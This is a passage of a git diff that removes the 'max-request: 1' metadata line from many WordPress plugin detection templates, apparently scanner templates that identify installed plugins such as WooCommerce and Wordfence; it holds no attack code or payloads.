metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 